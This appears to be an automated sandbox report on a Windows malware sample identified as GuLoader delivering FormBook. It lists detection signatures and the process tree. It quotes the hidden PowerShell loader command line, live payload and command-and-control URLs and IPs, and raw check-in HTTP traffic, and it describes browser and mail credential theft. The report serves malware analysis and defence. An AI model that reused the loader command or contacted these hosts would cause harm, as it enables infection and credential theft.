Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Forhandlingsfriheden.exe

Overview

General Information

Sample name:Forhandlingsfriheden.exe
Analysis ID:1572359
MD5:b149b18be3fec4cf93173c200384222c
SHA1:f9e248a8612781c407537750d4cdd515798edc34
SHA256:a1f2a8771d4075b694648ebb4cdd11bb2db213a947f8d08d6dca7a8710f651d7
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Forhandlingsfriheden.exe (PID: 2096 cmdline: "C:\Users\user\Desktop\Forhandlingsfriheden.exe" MD5: B149B18BE3FEC4CF93173C200384222C)
    • powershell.exe (PID: 5336 cmdline: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Opfattelsers.exe (PID: 5204 cmdline: "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe" MD5: B149B18BE3FEC4CF93173C200384222C)
        • PxuyeSuijNdsM.exe (PID: 4184 cmdline: "C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • svchost.exe (PID: 4576 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • firefox.exe (PID: 2032 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), CommandLine: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Forhandlingsfriheden.exe", ParentImage: C:\Users\user\Desktop\Forhandlingsfriheden.exe, ParentProcessId: 2096, ParentProcessName: Forhandlingsfriheden.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), ProcessId: 5336, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe" , ParentImage: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe, ParentProcessId: 4184, ParentProcessName: PxuyeSuijNdsM.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 4576, ProcessName: svchost.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), CommandLine: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Forhandlingsfriheden.exe", ParentImage: C:\Users\user\Desktop\Forhandlingsfriheden.exe, ParentProcessId: 2096, ParentProcessName: Forhandlingsfriheden.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bionomic\bambusmbler.gud';$Kunstvrkets=$Vibss.SubString(75330,3);.$Kunstvrkets($Vibss), ProcessId: 5336, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe" , ParentImage: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe, ParentProcessId: 4184, ParentProcessName: PxuyeSuijNdsM.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 4576, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T13:53:13.567218+010028032702Potentially Bad Traffic192.168.2.649850212.162.149.6680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T13:53:41.898306+010028554651A Network Trojan was detected192.168.2.649915165.22.38.18580TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T13:53:59.133846+010028554641A Network Trojan was detected192.168.2.649954154.88.22.10480TCP
            2024-12-10T13:54:01.890375+010028554641A Network Trojan was detected192.168.2.649961154.88.22.10480TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://212.162.149.66/KtFSlX90.binAvira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeReversingLabs: Detection: 18%
            Source: Yara matchFile source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeJoe Sandbox ML: detected
            Source: Forhandlingsfriheden.exeJoe Sandbox ML: detected
            Source: Forhandlingsfriheden.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Forhandlingsfriheden.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: CallSite.Targetore.pdbs source: powershell.exe, 00000002.00000002.2794477893.0000000000638000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PxuyeSuijNdsM.exe, 00000008.00000002.3359525503.000000000038E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Opfattelsers.exe, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2934822326.000000001F416000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2936587468.000000001F5C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3027687212.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.3029685656.0000000003500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: svchost.pdb source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: Opfattelsers.exe, 00000006.00000003.2995513897.0000000003B54000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2995430924.0000000003B4A000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.3103486155.0000000001435000.00000004.00000020.00020000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000003.2965427786.000000000142B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029CC660 FindFirstFileW,FindNextFileW,FindClose,9_2_029CC660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor eax, eax9_2_029B9EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov ebx, 00000004h9_2_0360051F

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49915 -> 165.22.38.185:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49954 -> 154.88.22.104:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49961 -> 154.88.22.104:80
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49850 -> 212.162.149.66:80
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.66
            Source: global trafficHTTP traffic detected: GET /KtFSlX90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.66Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /rym4/?uVKlz=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&RPITK=DxtTE6 HTTP/1.1Host: www.carhireheaven.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global trafficDNS traffic detected: DNS query: www.carhireheaven.online
            Source: global trafficDNS traffic detected: DNS query: www.dy01urj.pro
            Source: unknownHTTP traffic detected: POST /f425/ HTTP/1.1Host: www.dy01urj.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.dy01urj.proReferer: http://www.dy01urj.pro/f425/Cache-Control: no-cacheContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+Data Raw: 75 56 4b 6c 7a 3d 33 71 2b 42 32 72 54 6d 48 63 79 54 69 5a 71 37 68 4a 67 52 55 6d 4b 33 66 4d 45 39 68 48 47 65 4e 69 39 39 5a 6d 35 51 73 43 4f 71 7a 42 35 41 59 51 4b 75 38 54 70 2f 4d 7a 45 50 45 4c 43 72 66 4a 34 6a 61 68 74 5a 7a 52 62 64 76 62 57 48 2b 42 52 61 71 56 35 79 5a 2f 64 67 63 7a 76 53 61 48 44 4c 76 32 41 67 2b 69 55 42 45 36 75 35 45 73 6c 4f 4f 6d 4c 71 6c 55 65 38 62 51 7a 6a 77 37 2f 44 6f 4d 52 4b 53 37 39 32 76 44 56 68 32 6b 61 75 7a 34 53 39 71 42 70 55 36 6d 42 62 36 35 7a 6f 66 7a 58 5a 73 6f 46 32 53 38 4b 4f 31 67 35 56 48 33 49 63 32 76 53 62 37 47 6f 54 4e 65 52 77 54 63 38 42 73 33 4d 56 Data Ascii: uVKlz=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Tue, 10 Dec 2024 12:53:41 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
            Source: Opfattelsers.exe, 00000006.00000003.2935042588.0000000003B3A000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039878471.0000000003B3C000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000003.2935165232.0000000003B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/
            Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/KtFSlX90.bin
            Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/KtFSlX90.bin%
            Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/KtFSlX90.bin&
            Source: Opfattelsers.exe, 00000006.00000002.3039764364.0000000003AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.66/KtFSlX90.binsd
            Source: powershell.exe, 00000002.00000002.2802643987.0000000007E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: Forhandlingsfriheden.exe, Opfattelsers.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: PxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dy01urj.pro
            Source: PxuyeSuijNdsM.exe, 00000008.00000002.3367185482.0000000008CCA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dy01urj.pro/f425/
            Source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Opfattelsers.exe, 00000006.00000001.2794074840.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000002.00000002.2795610607.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2795610607.0000000004838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
